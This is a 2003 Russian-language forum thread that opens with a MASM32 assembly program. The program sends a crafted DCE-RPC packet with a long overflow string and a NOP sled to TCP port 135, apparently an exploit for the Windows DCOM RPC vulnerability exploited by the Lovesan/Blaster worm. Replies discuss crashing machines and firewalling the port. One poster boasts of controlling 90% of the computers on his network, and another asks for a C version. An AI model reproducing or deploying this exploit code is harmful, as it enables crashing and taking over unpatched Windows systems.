|
| Посл.отвђт | Сообщенiе |
|
|
Дата: Авг 15, 2003 23:23:12 · Поправил: Безпощадный даос
.386
.model flat, stdcall
option casemap :none ; case sensitive
include \masm32\include1\windows.inc
include \masm32\include1\kernel32.inc
include \masm32\include1\wsock32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\wsock32.lib
FuckeCommp proto :dword
.data
FuckeIP db "127.0.0.1",0
wsadata WSADATA <>
destination_sin sockaddr_in <>
firster db 05h,00h,0bh,03h,10h,00h,00h,00h,48h,00h,00h,00h,7fh,00h,00h,00h
db 0d0h,16h,0d0h,16h,00h,00h,00h,00h,01h,00h,00h,00h,01h,00h,01h,00h
db 0a0h,01h,00h,00h,00h,00h,00h,00h,0c0h,00h,00h,00h,00h,00h,00h,46h
db 00h,00h,00h,00h,04h,5dh,88h,8ah,0ebh,1ch,0c9h,11h,9fh,0e8h,08h,00h
db 2bh,10h,48h,60h,02h,00h,00h,00h
secnn db 5,0,0,3,16,0,0,0,168,6,0,0,229,0,0,0
db 144,6,0,0,1,0,4,0,5,0,6,0,1,0,0,0
db 0,0,0,0,50,36,88,253,204,69,100,73,176,112,221,174
db 116,44,150,210,96,94,13,0,1,0,0,0,0,0,0,0
db 112,94,13,0,2,0,0,0,124,94,13,0,0,0,0,0
db 16,0,0,0,128,150,241,241,42,77,206,17,166,106,0,32
db 175,110,114,244,12,0,0,0,77,65,82,66,1,0,0,0
db 0,0,0,0,13,240,173,186,0,0,0,0,168,244,11,0
db 32,6,0,0,32,6,0,0,77,69,79,87,4,0,0,0
db 162,1,0,0,0,0,0,0,192,0,0,0,0,0,0,70
db 56,3,0,0,0,0,0,0,192,0,0,0,0,0,0,70
db 0,0,0,0,240,5,0,0,232,5,0,0,0,0,0,0
db 1,16,8,0,204,204,204,204,200,0,0,0,77,69,79,87
db 232,5,0,0,216,0,0,0,0,0,0,0,2,0,0,0
db 7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,196,40,205,0,100,41,205,0,0,0,0,0
db 7,0,0,0,185,1,0,0,0,0,0,0,192,0,0,0
db 0,0,0,70,171,1,0,0,0,0,0,0,192,0,0,0
db 0,0,0,70,165,1,0,0,0,0,0,0,192,0,0,0
db 0,0,0,70,166,1,0,0,0,0,0,0,192,0,0,0
db 0,0,0,70,164,1,0,0,0,0,0,0,192,0,0,0
db 0,0,0,70,173,1,0,0,0,0,0,0,192,0,0,0
db 0,0,0,70,170,1,0,0,0,0,0,0,192,0,0,0
db 0,0,0,70,7,0,0,0,96,0,0,0,88,0,0,0
db 144,0,0,0,64,0,0,0,32,0,0,0,56,3,0,0
db 48,0,0,0,1,0,0,0,1,16,8,0,204,204,204,204
db 80,0,0,0,79,182,136,32,255,255,255,255,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,1,16,8,0,204,204,204,204
db 72,0,0,0,7,0,102,0,6,9,2,0,0,0,0,0
db 192,0,0,0,0,0,0,70,16,0,0,0,0,0,0,0
db 0,0,0,0,1,0,0,0,0,0,0,0,120,25,12,0
db 88,0,0,0,5,0,6,0,1,0,0,0,112,216,152,147
db 152,79,210,17,169,61,190,87,178,0,0,0,50,0,49,0
db 1,16,8,0,204,204,204,204,128,0,0,0,13,240,173,186
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 24,67,20,0,0,0,0,0,96,0,0,0,96,0,0,0
db 77,69,79,87,4,0,0,0,192,1,0,0,0,0,0,0
db 192,0,0,0,0,0,0,70,59,3,0,0,0,0,0,0
db 192,0,0,0,0,0,0,70,0,0,0,0,48,0,0,0
db 1,0,1,0,129,197,23,3,128,14,233,74,153,153,241,138
db 80,111,122,133,2,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0
db 1,16,8,0,204,204,204,204,48,0,0,0,120,0,110,0
db 0,0,0,0,216,218,13,0,0,0,0,0,0,0,0,0
db 32,47,12,0,0,0,0,0,0,0,0,0,3,0,0,0
db 0,0,0,0,3,0,0,0,70,0,88,0,0,0,0,0
db 1,16,8,0,204,204,204,204,16,0,0,0,48,0,46,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 1,16,8,0,204,204,204,204,104,0,0,0,14,0,255,255
db 104,139,11,0,2,0,0,0,0,0,0,0,0,0,0,0
db 134,1,0,0,0,0,0,0,134,1,0,0,92,0,92,0
db 70,0,88,0,78,0,66,0,70,0,88,0,70,0,88,0
db 78,0,66,0,70,0,88,0,70,0,88,0,70,0,88,0
db 70,0,88,0,157,19,0,1,204,224,253,127,204,224,253,127
db 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
db 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
db 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
db 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
db 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
db 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
db 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
db 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
db 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
db 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
db 144,144,144,144,144,144,144
db 725 dup (0cch)
.code
start:
int 3
invoke WSAStartup, 202h, addr wsadata
invoke FuckeCommp, addr FuckeIP
invoke ExitProcess, 0
;##################################################
FuckeCommp proc uses edi esi ebx pAdres:dword
LOCAL hSocket:dword
LOCAL recbuf[200]:byte
LOCAL buffrr[40]:byte
invoke lstrcpy, addr buffrr, pAdres
invoke socket, AF_INET, SOCK_STREAM, 0
.if eax != -1
mov hSocket, eax
mov destination_sin.sin_family, AF_INET
invoke htons, 135
mov destination_sin.sin_port, ax
invoke inet_addr, addr buffrr
mov destination_sin.sin_addr, eax
invoke connect, hSocket, addr destination_sin, sizeof destination_sin
.if eax != -1
invoke send, hSocket, addr firster, 72, 0
.if eax != -1
invoke recv, hSocket, addr recbuf, 200, 0
lea ebx, recbuf
invoke send, hSocket, addr secnn, 1704 , 0
.endif
.endif
.endif
invoke closesocket, hSocket
mov eax, ebx
ret
FuckeCommp endp
;##################################################
end start |
|
|
Дата: Авг 16, 2003 01:56:08 Уж не та ли это хрень что в Worm.Win32.Lovesan используется? Реально заеб, пришлость DCOM сесь остановить, а то по инету лазить невозможно вобще - каждые 3 минуты тачка падет. Буфер блин сорвать нормально не могут чтоб тачка не падала =)) ЗЫ. А сервиспаки мы не ставим по этическим соображениям. |
|
|
Дата: Авг 16, 2003 03:28:11 Я может быть и параноик, но в инет даже с домашнего компа хожу с виртуальной машины, которая до кучи ещё и жестоко зафайрволена снаружи и на которой кроме винды, браузера и ещё пары сетевых программок ничего нету, даже почта в другой vm. И никаких вирусов/червей/троянов не заметно. Хоть бы кто-нибудь заразил. |
|
|
Дата: Авг 18, 2003 14:11:10 Dr.Golova Я поставил AtGuard на сервер и открыл 135 порт только для внутренней подсети. И усе... За 2 дня - 11 попыток |
|
|
Дата: Авг 24, 2003 02:49:21 Да, господа! Если без фаирвола и без заплпатки, то всё семейство NT, падает на колени. Я сам посмотрел на ету радость и удивился. В моей сети 90% компов было в моей власти. !!!ЛЯПОТААА!!! |
|
|
Дата: Сен 4, 2003 15:48:11 И с моей коровой аналогичная фигня, см. HEAP |
|
|
Дата: Сен 13, 2003 15:18:52 А на C есть? |